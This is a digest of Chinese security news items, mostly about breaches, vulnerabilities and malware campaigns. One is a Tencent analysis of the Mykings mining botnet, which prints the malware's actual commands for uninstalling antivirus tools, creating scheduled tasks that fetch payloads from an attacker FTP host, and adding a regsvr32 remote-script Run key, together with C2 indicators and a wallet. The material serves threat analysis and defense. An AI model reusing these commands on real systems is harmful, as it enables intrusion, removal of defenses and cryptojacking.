安全快讯Top News

SK 海力士、LG 电子被黑 50GB 机密文件被加密勒索

这年头不管多大的公司,一不小心都有可能被黑客盯上,韩国两大电子巨头SK海力士、LG电子就被黑了,多达50GB机密文件被加密勒索。 据韩媒报道,日前一个勒索组织攻击了LG电子和SK海力士的网站,窃取了大量机密,包括极为机密的商业谈判信息。 具体来说,是这两家公司在美国的办事处被攻击,窃取了电脑硬盘中存储的数据,其中既有员工的个人照片、护照副本等个人信息,也有一些商业信息,比如SK海力士与苹果、IBM等客户进行价格谈判的电子邮件等。 从报道来看,SK海力士主要损失的是2013-2015年间的数据,容量大小约为597MB,而LG电子损失的数据容量高达50.1GB。 这次攻击据悉是一个名为Maze的黑客组织进行的,他们已经在网上发布了一部分信息,任何人都可以访问。 如果LG和SK海力士两家再不交钱赎回,那么后续还会放出更多信息,逼迫这两家公司交钱。 随后LG电子和SK海力士公司回应称,他们已经恢复了系统,并采取了安全措施,不过对于机密数据被泄,以及是否交钱赎回数据,两家公司没有回应。 (稿源:快科技,封面源自网络。)

Mykings 僵尸网络新变种通过 PcShare 远程控制,已感染超 5 万台电脑挖矿

感谢腾讯御见威胁情报中心来稿! 原文链接:https://mp.weixin.qq.com/s/wZvnq6gVnEdGSH6f6oG8MA   最新版Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制。Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。 一、背景 腾讯安全威胁情报中心检测到Mykings挖矿僵尸网络变种木马,更新后的Mykings会在被感染系统安装开源远程控制木马PcShare,对受害电脑进行远程控制:可进行操作文件、服务、注册表、进程、窗口等多种资源,并且可以下载和执行指定的程序。 Mykings僵尸网络木马还会关闭Windows Defender、检测卸载常见杀毒软件;卸载竞品挖矿木马和旧版挖矿木马;下载“暗云”木马感染硬盘主引导记录(MBR)实现长期驻留;通过计划任务、添加启动项等实现开机自动运行等行为。 MyKings僵尸网络最早于2017年2月左右开始出现,该僵尸网络通过扫描互联网上 1433 及其他多个端口渗透进入受害者主机,然后传播包括DDoS、Proxy(代理服务)、RAT(远程控制木马)、Miner(挖矿木马)、暗云III在内的多种不同用途的恶意代码。由于MyKings僵尸网络主动扩散的能力较强,影响范围较广,对企业用户危害严重。根据门罗币钱包算力1000KH/s进行推测,Mykings僵尸网络目前已控制超过5万台电脑进行挖矿作业。 腾讯安全系列产品已支持检测、清除Mykings僵尸网络的最新变种,具体响应清单如下: 应用场景 安全产品 解决方案 威 胁 情 报 腾讯T-Sec 威胁情报云查服务 (SaaS) 1)Mykings僵尸网络相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics 腾讯T-Sec 高级威胁追溯系统 1)Mykings僵尸网络相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts 云原生安全 防护 云防火墙 (Cloud Firewall,CFW) 基于网络流量进行威胁检测与主动拦截,已支持: 1)    Mykings僵尸网络关联的IOCs已支持识别检测; 2)    通过协议特征检测主机挖矿行为; 3)    SQL Server弱口令爆破登陆行为检测; 有关云防火墙的更多信息,可参考: https://cloud.tencent.com/product/cfw 腾讯T-Sec  主机安全 (Cloud Workload Protection,CWP) 1)    已支持查杀Mykings僵尸网络相关木马程序; 2)    云主机SQL Server弱口令风险项检测; 腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp 腾讯T-Sec 安全运营中心 基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html 非云企业安全防护 腾讯T-Sec 高级威胁检测系统 (腾讯御界) 1)    已支持通过协议检测Mykings僵尸网络与服务器的网络通信; 2)    通过协议特征检测主机挖矿行为; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta 腾讯T-Sec终端安全管理系统(御点) 1)可查杀Mykings僵尸网络入侵释放的木马程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html 二、样本分析 mykings通过mssql爆破(1433端口)攻击windows服务器,爆破登陆成功后执行Powershell脚本power.txt。Power.txt首先关闭Windows Defender相关功能,然后下载kill.txt清除旧版挖矿程序。 Kill.txt根据进程名匹配旧版挖矿程序,其中标记为“1”代表清除对应的WMI启动项,列表中Mykings常用进程名包括: uihost64.exe、dhelper.exe、msinfo.exe、u.exe、lsmose.exe、lsmos.exe、lsmo.exe、csrw.exe、csrw.exe、lsmosee.exe、lsmma.exe、lsmm.exe、lsmmaa.exe、lsmma.exe、new.exe、upsupx.exe、lsma.exe、lsmab.exe、lsmaaa.exe、lsma30.exe、lsma31.exe 删除旧版WMI事件过滤器“fuckyoumm2_filter”、消费者“fuckyoumm2_consumer”,从而删除WMI启动项。 2.1持久化 Power.txt接着下载uninstall.txt执行,完成卸载杀软、删除旧版挖矿木马、以及通过安装Windows计划任务、RUN启动项、WMI启动项进行本地持久化操作。 1、 卸载指定杀毒软件; wmic.exe product where “name like ‘%Eset%'” call uninstall /nointeractive wmic.exe product where “name like ‘%%Kaspersky%%'” call uninstall /nointeractive wmic.exe product where “name like ‘%avast%'” call uninstall /nointeractive wmic.exe product where “name like ‘%avp%'” call uninstall /nointeractive wmic.exe product where “name like ‘%Security%'” call uninstall /nointeractive wmic.exe product where “name like ‘%AntiVirus%'” call uninstall /nointeractive wmic.exe product where “name like ‘%Norton Security%'” call uninstall /nointeractive cmd /c “C:\Progra 1\Malwarebytes\Anti-Malware\unins000.exe” /verysilent /suppressmsgboxes /norestart 2、安装计划任务“oka”启动新版挖矿木马lsma12.exe,杀死进程java.exe; schtasks /create /tn “oka” /tr “cmd /c start c:\windows\inf\aspnet\lsma12.exe -p” /ru “system” /sc onstart /F wmic.exe process where ExecutablePath=’c:\\windows\\java\\java.exe’ call Terminate 3、安装计划任务”Mysa”、”Mysa2″,在每次系统启动时执行命令,使用账号test密码1433登陆FTP服务器ftp[.]ftp0930[.]host下载木马a1.exe和s1.rar并执行; schtasks /create /tn “Mysa” /tr “cmd /c echo open ftp.ftp0930.host >s echo test>>s echo 1433>>s echo binary>>s echo get a1.exe c:\windows\update.exe>>s echo bye>>s ftp -s:s c:\windows\update.exe” /ru “system” /sc onstart /F schtasks /create /tn “Mysa2” /tr “cmd /c echo open ftp.ftp0930.host>ps echo test>>ps echo 1433>>ps echo get s1.rar c:\windows\help\lsmosee.exe>>ps echo bye>>ps ftp -s:ps c:\windows\help\lsmosee.exe” /ru “system” /sc onstart /F 4、设置拒绝“system”用户访问指定文件和路径; cacls c:\windows\java\java.exe /e /d system cacls c:\windows\temp\servtestdos.dll /e /d system cacls C:\WINDOWS\Fonts\cd /e /d system 5、安装RUN启动项“start”负责下载执行脚本v1.sct,同时删除旧启动项“start1”,删除旧计划任务“Mysa3”、“ok”、“Mysa1”、“my1”。 reg add “HKLM\Software\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f reg add “HKLM\Software\wow6432node\Microsoft\Windows\CurrentVersion\Run” /v “start” /d “regsvr32 /u /s /i:http[:]//js.down0116.info:280/v1.sct scrobj.dll” /f reg delete HKlm\Software\Microsoft\Windows\CurrentVersion\Run /v “start1” /f SCHTASKS /Delete /TN “Mysa3” /F SCHTASKS /Delete /TN “ok” /F SCHTASKS /Delete /TN “Mysa1” /F SCHTASKS /Delete /TN “my1” /F 6、继续删除旧版的名称为“coronav”(新冠)的WMI启动项,同时安装新版的“coronav”WMI启动项,在其中通过Powershell下载和执行以下脚本: http[:]//ruisgood.ru/power.txt http[:]//gamesoxalic.com/power.txt 或者通过regsvr32下载和执行脚本: http[:]//ruisgood.ru/s.txt http[:]//gamesoxalic.com/s.txt 7、安装WMI启动项“fuckamm3”、“fuckamm4”启动新版挖矿木马程序: 8、Download.txt负责下载门罗币挖矿程序、Mykings更新程序和安装“暗云”木马感染程序: 2.2自更新 Download.txt下载的ups.dat为自解压程序,解压后释放多个文件到temp目录下,执行竞品挖矿木马清除、挖矿木马下载和启动,以及安装启动项等更新操作。释放的文件包括: c:\windows\temp\ntuser.dat c:\windows\temp\upx.exe %temp%\c3.bat %temp%\excludes %temp%\n.vbs Download.txt 下载的“暗云”木马max.rar会感染MBR执行shellcode,从云端获取Payload并最终获取Mykings相关木马文件。下载Payload网络流量如下: 首先从C2服务器http[:]//95.214.9.95/pld/cmd.txt下载cmd.txt。 然后向服务器(http[:]//95.214.9.95/pld/login.aspx?uid=***&info=***)发送上线信息,参数包括设备标识号uid和info,其中info包括计算机名、出口IP、CPU型号、CPU数量、内存大小信息,info数据经过base64编码,服务器接收数据后返回“AcceptOK”。 2.3 PcShare远控木马 返回数据cmd.txt中指定下载的20200809.rar为PcShare开源远控木马,该木马在github上有多个版本https[:]//github.com/LiveMirror/pcshare。木马下载后被拷贝至: c:\windows\debug\item.dat,启动命令为: rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa。 PcShare可根据服务端指令执行以下多种远控功能,该木马源代码在多个共享平台可供下载,黑客可以随意下载和重新修改编译。 1.枚举、创建、重命名、删除文件和目录 2.枚举和终止进程 3.编辑注册表项和值 4.枚举和修改服务 5.枚举和控制窗口 6.执行二进制文件 7.从C&C或提供的URL下载其他文件 8.将文件上传到C&C 9.执行shell命令 10.显示消息框 11.重新启动或关闭系统 PcShare连接C2服务器:192.187.111.66:5566。 2.4挖矿 Download.txt从地址http[:]//ruisgood.ru/1201.rar下载得到XMRig挖矿程序,从地址http[:]//ruisgood.ru/config2.json下载得到挖矿配置文件,然后启动挖矿进程: c:\windows\inf\aspnet\lsma12.exe 挖矿时使用矿池:xmr-eu1.nanopool.org:14444 门罗币钱包: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka 查询该钱包,已挖矿获得143个XMR,折合人民币8万余元。而其矿池算力平均为1000Kh/s(盈利100美元/天),可推算约5万台电脑被控制挖矿。 IOCs C&C 192.187.111.66:5566 95.214.9.95 Domain ruisgood.ru ftp.ftp0801.ru gamesoxalic.com ftp.ftp0930.host js.down0116.info js.mys2016.info wmi.1217bye.host js.5b6b7b.ru up.mykings.pw kriso.ru f321y.com down.f4321y.com IP 199.168.100.74 173.247.239.186 174.128.235.243 223.25.247.152 167.88.180.175 139.5.177.10 173.247.239.186 185.239.227.82 URL http[:]//ruisgood.ru/ups.dat http[:]//ruisgood.ru/power.txt http[:]//ruisgood.ru/1201.rar http[:]//ruisgood.ru/uninstall.txt http[:]//ruisgood.ru/max.rar http[:]//ruisgood.ru/config2.json http[:]//ruisgood.ru/s.txt http[:]//ruisgood.ru/upx.exe http[:]//ruisgood.ru/s.xsl http[:]//ruisgood.ru/download2.txt http[:]//ruisgood.ru/batpower.txt http[:]//ruisgood.ru/ups.dat http[:]//ruisgood.ru/download.txt http[:]//ruisgood.ru/kill.txt http[:]//ruisgood.ru/up.txt http[:]//ruisgood.ru/wmi.txt http[:]//ruisgood.ru/batpower.tx http[:]//ruisgood.ru/up2.txt http[:]//gamesoxalic.com/power.txt http[:]//gamesoxalic.com/s.txt ftp[:]//199.168.100.74/aa.exe ftp[:]//199.168.100.74/1.dat ftp[:]//ftp.ftp0801.ru/1.dat ftp[:]//ftp.ftp0801.ru/aa.exe ftp[:]//ftp.ftp0930.host/a1.exe ftp[:]//ftp.ftp0930.host/s1.rar http[:]//js.down0116.info:280/v1.sct http[:]//174.128.235.243/wmi.txt http[:]//174.128.235.243/upsupx2.exe http[:]//174.128.235.243/u.exe http[:]//199.168.100.74/20200809.rar http[:]//199.168.100.74:8074/1201.rar http[:]//173.247.239.186:9999/max.exe http[:]//173.247.239.186:9999/u.exe http[:]//185.239.227.82:8082/2.exe http[:]//wmi.1217bye.host/S.ps1 http[:]//95.214.9.95/pld/cmd.txt http[:]//223.25.247.152:8152/batpower.txt http[:]//167.88.180.175:8175/kill.txt http[:]//167.88.180.175:8175/uninstall.txt http[:]//139.5.177.10:280/psa.jpg http[:]//199.168.100.74/2.exe http[:]//199.168.100.74:8074/2.exe http[:]//173.247.239.186/2.exe http[:]//185.239.227.82:8082/2.exe http[:]//173.247.239.186:9999/2.exe http[:]//js.5b6b7b.ru/v.sct http[:]//js.5b6b7b.ru:280/v.sct http[:]//up.mykings.pw/update.txt http[:]//kriso.ru/java12.dat http[:]//js.ftp0930.host/helloworld.msi http[:]//f321y.com:8888/dhelper.dat http[:]//down.f4321y.com:8888/kill.html md5 20200809.rar dce4ac18798ea897cdc9e09e06b178be max.rar bc7fc83ce9762eb97dc28ed1b79a0a10 u.exe d9c32681d65c18d9955f5db42154a0f3 ups.dat d1f978c88023639d6325805eb562de8c upsupx2.exe b5cd8af63e35db23eb1c6a4eb8244c45 address.txt 83bdb3a6fb995788de262b22919524f1 cloud.txt 6b9b70f4e0c8885d12169045e906d698 cmd.txt 6def7a0c5707f24a912c79f6520ca86f kill.txt 1573ab993edc98decc09423fd82ec5ed micro f0129d85b17ee4d29ef52c63e0e548a4 power.txt 5670f0839333e4b160be05177601b40c uninstall.txt 6092899216610fea5c65e416b34c1777 update.txt 581a86fea2afeb9b9d6d04c9a8f0a5c1 wmi.txt 6afc95f60630a588a7826608c70a60c8 wpd.jpg bbae338b0cac5a2d169b8c535f33bfa0 batpower.txt 40160c782c2a41eed8d8eaf0c706050a up.txt 6c190a44db2118d9c07037d769e0a62d ups.txt f41a8a69361fccc13344493c04a4f0d8 s.ps1 966abd05b7ad1b0b89d2a846f8a5a8f2 testav.dat d4f7a3f44ae3f21863b1440219388a5b psa.jpg 9cb1c1a78ce3efe57eef5f128b43710a 门罗币钱包: 4BrL51JCc9NGQ71kWhnYoDRffsDZy7m1HUU7MRU4nUMXAHNFBEJhkTZV9HdaL4gfuNBxLPc3BeMkLGaPbF5vWtANQo6GYsXhWxuSrS7Uka 参考链接: https://www.freebuf.com/articles/193260.html https://www.freebuf.com/articles/network/161286.html https://blogs.blackberry.com/en/2019/09/pcshare-backdoor-attacks-targeting-windows-users-with-fakenarrator-malware

蓝牙 BLURtooth 漏洞让攻击者覆盖蓝牙认证密钥

蓝牙无线技术背后的组织今天发布了关于设备供应商如何缓解对蓝牙功能设备新攻击的指南。新发现的BLURtooth是蓝牙标准中一个名为Cross-Transport Key Derivation(CTKD)组件中的漏洞。该组件用于在两个蓝牙功能设备配对时协商和设置认证密钥。 该组件的工作原理是为蓝牙低能(BLE)和基本速率/增强数据速率(BR/EDR)标准设置两套不同的认证密钥。CTKD的作用是准备好密钥,让配对的设备决定他们要使用什么版本的蓝牙标准。它的主要用途是蓝牙 “双模式 “功能。 但根据蓝牙特别兴趣小组(SIG)和卡内基梅隆大学CERT协调中心(CERT/CC)今天发布的安全通告,攻击者可以操纵CTKD组件覆盖设备上的其他蓝牙认证密钥,并允许通过蓝牙连接的攻击者访问同一设备上的其他蓝牙功能服务/应用。 在某些版本的BLURtooth攻击中,认证密钥可以被完全覆盖,而其他认证密钥可以降级使用弱加密。所有使用蓝牙4.0到5.0标准的设备都有漏洞。蓝牙5.1标准带有可以激活和防止BLURtooth攻击的功能。 蓝牙SIG组织官员表示,他们开始通知蓝牙设备的供应商关于BLURtooth攻击,以及他们如何在使用5.1标准时减轻其影响。在撰写本文时,补丁还没有立即可用。防止BLURtooth攻击的唯一方法是控制蓝牙设备配对的环境,以防止中间人攻击,或通过社会工程(欺骗人类操作员)与流氓设备配对。 不过,蓝牙SIG组织预计在某个时间点会有补丁,并且被集成作为固件或操作系统更新提供给蓝牙备。目前,这些更新的时间表还不清楚,因为设备供应商和操作系统制造商通常在不同的时间表上工作,一些设备供应商和操作系统制造商可能不会像其他供应商那样优先考虑安全补丁。 用户可以通过检查固件和操作系统的发布说明,查看CVE-2020-15802,即BLURtooth漏洞的bug标识,来跟踪他们的设备是否已经收到BLURtooth攻击的补丁。根据蓝牙SIG的说法,BLURtooth攻击是由洛桑联邦理工学院(EPFL)和普渡大学的两组学者独立发现的。     (稿源:cnBeta,封面源自网络。)

爱尔兰要求 Facebook 停止向美国传送欧洲用户数据

据外媒报道,爱尔兰数据保护委员会(DPC)要求Facebook停止将用户数据从欧盟转移到美国。《华尔街日报》周三报道称,初步命令已于8月底发出。Facebook证实,爱尔兰DPC已经开始调查其从欧盟向美国传输的数据。这是欧盟公司和居民主要关心的隐私问题。 欧盟法院的决定使得允许企业将欧盟公民数据发送到美国的欧盟-美国隐私盾牌(EU-US Privacy Shield)这一行为失效。Facebook负责全球事务和通信的副总裁Nick Clegg表示,在做出这一决定后,Facebook一直有在阐明他们在如何确保国际数据传输的长期稳定方面的立场。 Clegg在周三的一份隐私声明中说道:“缺乏安全和合法的国际数据传输将损害欧盟经济、阻碍数据驱动业务的增长,就像我们在新冠中寻求复苏一样。”他表示,这可能意味着欧洲的科技公司、医院和大学不能使用美国的云服务提供商或欧盟以外的呼叫中心。“其影响将超出商业领域,还可能影响到医疗和教育等关键公共服务。” 对此,爱尔兰DPC拒绝置评。     (稿源:cnBeta,封面源自网络。)

攻击者滥用合法的云监控工具进行网络攻击

介绍 TeamTNT是一个网络犯罪组织,其目标是包括Docker和Kubernetes实例在内的云环境。该组织先前已使用多种工具进行了记录,包括加密矿工和Amazon Web Services(AWS)凭证窃取蠕虫。 TeamTNT还被发现使用了恶意Docker镜像,该镜像可在Docker Hub上找到,以感染受害者的服务器。现在该小组正在发展。在Intezer观察到的近期攻击中,TeamTNT通过滥用Weave Scope来使用一种新技术,该工具可为用户提供对其云环境的完全访问权限,并与Docker,Kubernetes,分布式云操作系统(DC / OS)集成在一起,和AWS Elastic Compute Cloud(ECS)。攻击者安装此工具是为了映射受害者的云环境并执行系统命令,而无需在服务器上部署恶意代码。     … 更多内容请至Seebug Paper 阅读全文:https://paper.seebug.org/1333/ 消息与封面来源:INTEZER   ,译者:芋泥啵啵奶茶 本文由 HackerNews.cc 翻译整理。 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

新的 PIN 验证绕过漏洞影响 Visa 非接触式支付

就在Visa对一款名为Baka的新型JavaScript网络掠取器发出警告之际,网络安全研究人员发现了该公司支持EMV的信用卡中的一个新缺陷,该漏洞使攻击者能够非法获取资金并诈骗持卡人和商户。 这项研究是由苏黎世联邦理工学院的一群学者发表的,它是一种PIN绕行攻击,攻击者可以利用受害者的被盗或丢失的信用卡在不知道该卡PIN的情况下进行高价值购买,甚至骗人一点销售(PoS)终端接受非真实的离线卡交易。 所有使用Visa协议的现代非接触式卡,包括Visa Credit,Visa Debit,Visa Electron和V Pay卡,都受到安全漏洞的影响,但研究人员认为它可以应用于Discover和UnionPay实施的EMV协议。然而,这个漏洞并不影响万事达、美国运通和JCB。 研究结果将在明年5月于旧金山举行的第42届IEEE 安全和隐私研讨会上进行展示。 通过MitM攻击修改卡交易资格 EMV(Europay、Mastercard和Visa的缩写)是广泛使用的智能卡支付的国际协议标准,它要求较大的金额只能从带有PIN码的信用卡中借记。 但ETH研究人员设计的设置利用了协议中的一个关键缺陷,通过Android应用程序发起中间人(MitM)攻击,“指示终端不需要PIN验证,因为持卡人验证是在消费者的设备上进行的。” 这个问题源于这样一个事实:持卡人验证方法(CVM)没有加密保护以防止修改,该方法用于验证尝试使用信用卡或借记卡进行交易的个人是否是合法持卡人。 所以,可以修改用于确定交易所需的CVM检查(如果有的话)的卡交易资格证明(CTQ),以通知PoS终端覆盖PIN验证,并且验证是使用持卡人的设备进行的例如智能手表或智能手机(称为消费设备持卡人验证方法或CDCVM)。 利用离线交易而无需付费 此外,研究人员还发现了第二个漏洞,该漏洞涉及Visa卡或旧万事达卡进行的离线非接触式交易,使得攻击者能够在数据被传送到终端之前修改一个名为“应用密码”(AC)的特定数据。 离线卡通常用于直接从持卡人的银行帐户中支付商品和服务,而无需PIN码。但是,由于这些交易未连接到在线系统,因此在银行使用密码确认交易的合法性之前会有24到72个小时的延迟,然后从帐户中扣除购买金额。 攻击者可以利用这种延迟的处理机制来使用他们的卡来完成低价值的离线交易而无需支付费用,此外,在发卡银行由于密码错误而拒绝交易之前,还可以取消购买。 研究人员说:“这构成了“免费午餐”攻击,因为罪犯可以购买低价值的商品或服务而根本不收取任何费用,”他补充说,这些交易的低价值性质不太可能是“有吸引力的业务”。罪犯的榜样。” 缓解PIN绕过和离线攻击 除了向Visa国际组织通报缺陷外,研究人员还提出了三种软件修复方案,以防止PIN绕过和离线攻击,包括使用动态数据认证(DDA)保护高价值的在线交易,以及要求所有PoS终端使用在线密码,这会导致脱机事务被联机处理。 研究人员得出结论:“我们的攻击表明,PIN对Visa非接触式交易毫无用处,而且揭示了Mastercard和Visa的非接触式支付协议的安全性存在惊人的差异,表明万事达卡比Visa更安全。”这些缺陷违反了基本的安全属性,比如身份验证和有关已接受交易的其他保证。”     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。

微软否认 Windows Defender 新功能是一个安全风险

据外媒mspoweruser报道,他们两天前曾报道过Windows Defender增加了通过命令行下载文件的功能。比如MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]。然而有安全研究人员表示担心,新功能增加了Windows 10的攻击能力,它可能会被用来下载恶意二进制文件。 对此,微软现在发表声明回应称:“尽管有这些报告,微软Defender杀毒软件和微软Defender ATP将仍然保护客户免受恶意软件。这些程序可以侦测经由防病毒文件下载功能下载到系统的恶意文件。” 另外微软还表示,该功能不能用于特权升级。 虽然微软否认该功能存在的安全风险,但众所周知,攻击越严重系统的安全性越低。一些用户抱怨称,他们无法通过禁用该新功能来锁定自己的电脑。     (稿源:cnBeta,封面源自网络。)

微软将修改 HOSTS 屏蔽 Win10 遥测数据视作一个严重的安全风险

作为完善 Windows 10 开发的一个重要组成部分,微软希望联网用户允许其上传部分遥测用的系统数据。通常情况下,它会包括 CPU、内存等硬件的基础配置信息,并在传输过程中予以完全的加密。基于分析,微软得以确定系统的安全性和可靠性问题,从而为后续的修复奠定基础。 尽管微软不允许用户彻底禁用遥测收集,但你始终可以清理被 Windows 收集的相关诊断数据。 矛盾的是,虽然遥测被视作 Windows 10 开发所必须、且其它企业也在利用相同的方案来改进其软件,但一些批评人士仍将其视作微软的一项“间谍”行为。 近日,微软为 Windows 10 内置的 Windows Defender(又名 Microsoft Defender)安全软件引入了一项更改。 当检测到用户尝试通过编辑 HOSTS 文件来阻止遥测时,该软件就会发出相应的警告。 维基百科上的资料称,HOSTS 文件被用于辅助网络名称解析(即主机名称到 IP 地址的相关映射)。 但在近日的 Windows 10 更新之后,Microsoft Defender 将特别检查用户的 HOSTS 文件是否已经阻止了微软的遥测服务。 如果尝试编辑 HOSTS 文件以阻止遥测,则会触发 Windows Defender 的这一警告,以阻止用户采取这一措施。 你会注意到对 HOSTS 文件的相关编辑操作将被拒绝保存,且被安全中心标记为“SettingsModifier:Win32 / HostsFileHijack”。 除非点击允许放行,否则这项涉及“严重安全风险”的文件编辑操作将无法继续。当然,这项更新也有助于防止系统文件遭遇其它形式的恶意篡改。     (稿源:cnBeta,封面源自网络。)

安全研究人员警告 Windows 10 定制主题可被用于窃取用户凭证

Bleeping Computer 援引安全研究员 Jimmy Bayne 的 Twitter 爆料称:Windows 10 的主题设置存在漏洞,恶意行为者可创建特定的主题来实施“哈希传递”(Pass-the-Hash)攻击,从而窃取用户的凭证。具体说来是,可安装与其它来源分离的主题功能,使得攻击者能够创建恶意主题文件,从而在文件打开时将用户重定向至需要输入其凭据的页面。 据悉,只需在桌面右键点击,即可引导至“个性化 -> 主题”设置页面。用户可接着点击“保存要分享的主题”,从而创建一个名为“.deskthemepack”的文件。 该方式创建的自定义主题,可通过电子邮件等渠道进行分享、下载和安装。攻击者亦可创建一个类似的“.theme”主题文件,但其中默认的壁纸设置可指向需要身份验证的网站。 当粗心的用户不慎输入其凭据时,包含详细信息的 NTLM 哈希值将被发送到站点进行身份验证,而后攻击者就能够通过特殊的逆运算软件来暴力破解非复杂的密码。 作为应对,Bleeping Computer 想到了通过组策略进行一些限制,以阻止将 NTLM 哈希凭证发送到远程主机。只是对于企业用户来说,这么做可能会干扰到正常的身份验证。 Bayne 补充道,其已将这些发现披露给微软安全响应中心(MSRC)。可惜由于这是一项“设计特性”,该 bug 并未得到修复。 至于软件巨头是否会在后续正式修复、或调整主题文件结构以防止不良利用行为,目前暂不得而知。     (稿源:cnBeta,封面源自网络。)  

Evilnum 黑客使用新的基于Python的木马攻击金融公司

至少自2018年以来,一家以金融科技行业为目标的攻击者改变了策略,加入了一种新的基于Python的远程访问特洛伊木马(RAT),该木马可以窃取密码、文档、浏览器cookie、电子邮件凭据和其他敏感信息。 在Cyber eason研究人员昨天发表的一项分析中,Evilnum不仅调整了其感染链,而且还部署了一个名为“ PyVil RAT”的Python RAT,它具有收集信息,截屏,捕获击键数据,打开SSH shell的功能,并且部署了新工具。 网络安全公司表示:“从2018年的第一份报告到今天,该集团的TTP已经随着不同的工具而发展,而集团继续专注于金融科技目标。”。 “这些变化包括感染链和持久性的改变,随着时间的推移正在扩展的新基础设施,以及使用新的Python脚本远程访问木马(RAT)”来监视其受感染的目标。 在过去的两年中,Evilnum与针对英国和欧盟范围内的公司的几次恶意软件攻击活动有关,这些恶意软件攻击活动涉及使用JavaScript和C#编写的后门程序,以及通过从恶意软件服务提供商Golden Chickens购买的工具。 早在7月,APT小组就被定位为使用鱼叉式网络钓鱼电子邮件的公司,这些电子邮件包含指向托管在Google云端硬盘上的ZIP文件的链接,以窃取软件许可证,客户信用卡信息以及投资和交易文件。 虽然他们在受感染系统中获得最初立足点的作案手法保持不变,但感染程序已发生重大变化。 除了使用带有假冒的鱼叉式网络钓鱼电子邮件(KYC)来诱骗金融业员工触发恶意软件外,攻击还从使用具有后门功能的基于JavaScript的特洛伊木马转移到了能够提供隐藏在合法可执行文件的修改版本中的恶意有效载荷,旨在逃避检测。 研究人员说:“JavaScript是这个新感染链的第一步,最终以有效载荷的传递为最终结果,该载荷是用py2exe编译的Python编写的RAT,Nocturnus研究人员称其为PyVil RAT。” 多进程传递过程(“ ddpp.exe”)在执行时,解压缩shellcode以便与攻击者控制的服务器建立通信,并接收第二个加密的可执行文件(“ fplayer.exe”),该文件用作下一阶段的下载程序以进行提取Python RAT。 研究人员指出:“在该小组的先前活动中,Evilnum的工具避免使用域与C2进行通信,而仅使用IP地址。” “虽然C2 IP地址每隔几周更改一次,但与此IP地址关联的域列表却在不断增长。” 随着APT技术的不断发展,企业必须保持警惕,员工要警惕他们的电子邮件是否存在网络钓鱼企图,并在打开来自未知发件人的电子邮件和附件时保持谨慎。     稿件与封面来源:The Hacker News,译者:芋泥啵啵奶茶。 本文由 HackerNews.cc 翻译整理, 转载请注明“转自 HackerNews.cc ” 并附上原文链接。